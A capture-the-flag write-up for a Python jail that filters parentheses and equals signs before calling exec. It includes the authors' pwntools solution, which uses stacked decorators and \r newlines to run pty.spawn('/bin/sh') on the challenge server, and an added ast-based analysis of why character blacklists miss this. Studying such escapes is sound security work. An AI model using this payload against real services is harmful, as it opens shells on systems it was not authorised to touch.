This challenge was analogous to the other Python jails, but with some additional constraints.
Source code of the server:
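```python
line = input('>>> ')

# Reject any input containing a parenthesis or an equals sign
blacklist = "()="
for item in blacklist:
    if item in line.lower():
        raise Exception()

# Whatever survives the filter is executed as Python source
exec(line)
```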
This challenge was not easy: with no parentheses, you cannot write an ordinary function call.
However, after playing around for a while, we noticed that the Python eval() function treats \r as a newline, and this let us send multi-line scripts through a single call.
We then got around the need for parentheses by stacking Python decorators on an empty class, with the payload encoded as a list of integers so that its own parentheses never appear in the text the server checks.
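Why the character blacklist misses this, as an added example that is not part of the original write-up: `passes_blacklist` mirrors the server's check, and `implicit_calls` (a hypothetical helper) uses Python's `ast` module to list the decorators and imports that invoke code without any `(` or `=` in the source. The constructed sample is shaped like the decorator payload described here but decodes to the harmless expression `1+1`, and it is only parsed, never executed.

```python
import ast

BLACKLIST = "()="  # the same characters the challenge server rejects


def passes_blacklist(line: str) -> bool:
    """Mirror the server's check: True when no blacklisted character appears."""
    return not any(ch in line.lower() for ch in BLACKLIST)


def implicit_calls(source: str) -> list[str]:
    """List constructs that run code, including ones that need no '(' or '='."""
    findings = []
    for node in ast.walk(ast.parse(source)):  # the parser accepts \r as a newline
        if isinstance(node, (ast.ClassDef, ast.FunctionDef, ast.AsyncFunctionDef)):
            # Each decorator is called with the decorated object as its argument.
            for dec in node.decorator_list:
                findings.append(f"decorator call: @{ast.unparse(dec)} on {node.name}")
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append("import: " + ", ".join(a.name for a in node.names))
        elif isinstance(node, ast.Call):
            findings.append(f"explicit call: {ast.unparse(node.func)}")
    return findings


# Constructed sample: same structure as the write-up's payload, but the integer
# list decodes to "1+1" rather than a command. It is parsed here, not executed.
SAMPLE = """import pty
for x in [[49,43,49]]:
 for y in [lambda z: x]:
  @print
  @eval
  @bytes
  @y
  class z: pass""".replace("\n", "\r")

if __name__ == "__main__":
    print("passes blacklist:", passes_blacklist(SAMPLE))
    for finding in implicit_calls(SAMPLE):
        print(finding)
```

The sample passes the blacklist while the syntax tree still shows four call sites, which is why filtering should be done on the parsed structure (or the input not passed to `exec` at all) rather than on characters.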
This was our solution for this one:
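```python
from pwn import *

io = connect('chal.b01lers.com', 1336)
io.read()

# The integer list is the ASCII encoding of: pty.spawn("/bin/sh")
# Decorators apply bottom-up: y returns the list, bytes turns it into a
# byte string, eval runs it, and print shows the result.
payload = """import pty
for x in [[112,116,121,46,115,112,97,119,110,40,34,47,98,105,110,47,115,104,34,41]]:
    for y in [lambda z: x]:
        @print
        @eval
        @bytes
        @y
        class z: pass""".replace("\n", "\r")  # \r keeps the script on one input() line

io.sendline(payload)
io.interactive()
```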
And this gives the following flag: